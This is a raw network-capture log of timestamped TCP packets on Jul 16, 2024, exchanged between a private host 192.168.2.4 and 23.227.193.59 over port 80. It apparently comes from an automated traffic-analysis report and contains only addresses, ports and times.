                                                                            Jul 16, 2024 22:29:51.913762093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.913773060 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.913795948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.913830042 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.913842916 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.913862944 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.913901091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.913902998 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.913937092 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.913969040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.913980961 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.914002895 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914050102 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.914057016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914092064 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914124966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914133072 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.914159060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914189100 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914205074 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.914222002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914258003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914267063 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.914287090 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.914331913 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.995372057 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995451927 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995507002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995541096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995541096 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.995577097 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995596886 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.995610952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995649099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995668888 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.995702028 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995734930 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995745897 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.995786905 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995820999 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995839119 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.995853901 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995889902 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995907068 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.995925903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.995984077 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.996319056 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996376038 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996409893 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996427059 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.996475935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996527910 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.996546984 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996582985 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996635914 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996638060 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.996670008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996720076 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.996721983 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996757030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996789932 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996807098 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.996824980 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996865988 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996874094 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.996917009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996951103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.996968985 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.996984959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997019053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997035980 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.997051001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997083902 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997102022 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.997119904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997170925 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.997203112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997236967 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997286081 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.997303963 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997337103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997370958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997381926 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.997404099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997454882 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.997478962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997512102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997545958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997560978 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.997580051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997612953 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.997631073 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.998320103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998373985 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998375893 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.998406887 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998461008 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.998497963 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998529911 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998564005 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998579979 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.998596907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998646021 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.998653889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998683929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998717070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998732090 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.998750925 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998783112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998804092 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.998817921 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998861074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998871088 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.998894930 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998927116 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.998945951 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999196053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999248028 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999250889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999285936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999337912 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999339104 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999372005 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999404907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999420881 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999438047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999474049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999490023 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999502897 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999538898 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999547958 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999573946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999625921 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999656916 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999691963 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999725103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999732971 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999753952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999788046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999799013 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999823093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999857903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999871969 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999893904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999927044 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.999947071 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.999959946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.000013113 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.000076056 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.000108957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.000144005 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.000158072 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.001569986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001619101 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001626968 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.001655102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001705885 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.001708984 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001741886 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001775980 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001791954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.001811981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001871109 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.001878023 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001914024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001946926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.001960993 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.001981020 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002015114 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002032042 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002048016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002080917 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002098083 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002151966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002185106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002202034 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002218962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002252102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002271891 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002285957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002320051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002334118 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002372980 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002405882 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002425909 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002439976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002475977 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002490044 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002509117 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002548933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002562046 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002685070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002717972 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002737045 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002752066 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002787113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002804995 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002820015 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002851963 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002871037 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002887964 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002922058 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002945900 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.002958059 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.002990961 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.003010035 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.056638002 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095266104 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095333099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095386982 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095439911 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095475912 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095477104 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095510006 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095525980 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095545053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095561981 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095578909 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095613003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095638037 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095645905 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095679045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095701933 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095711946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095746040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095763922 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095778942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095813036 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095829010 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095849991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.095901966 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.095983982 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096016884 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096050978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096071005 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096085072 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096120119 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096138954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096153021 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096187115 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096204042 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096220970 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096254110 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096271992 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096286058 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096321106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096338987 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096354008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096388102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096406937 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096421957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096456051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096472979 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096512079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096545935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096560955 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096579075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096628904 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.096940994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.096975088 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097007990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097038984 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097042084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097075939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097093105 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097109079 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097142935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097162962 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097176075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097209930 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097229004 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097244024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097276926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097290993 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097316027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097349882 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097362995 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097383976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097415924 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097434044 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097449064 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097482920 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097500086 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097518921 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097570896 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097784042 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097814083 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097846985 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097867966 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097879887 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097915888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097939968 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.097949982 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.097984076 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098001003 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098016977 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098050117 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098066092 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098083019 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098117113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098134041 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098150969 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098184109 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098201990 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098217010 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098249912 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098268986 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098283052 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098316908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098332882 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098350048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098383904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098400116 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098748922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098784924 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098807096 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098818064 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098850965 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098866940 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098886013 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098920107 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098941088 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.098953962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.098987103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099009037 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099020958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099054098 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099071026 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099087954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099122047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099139929 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:52.099154949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:52.099189997 CEST804973023.227.193.59192.168.2.4
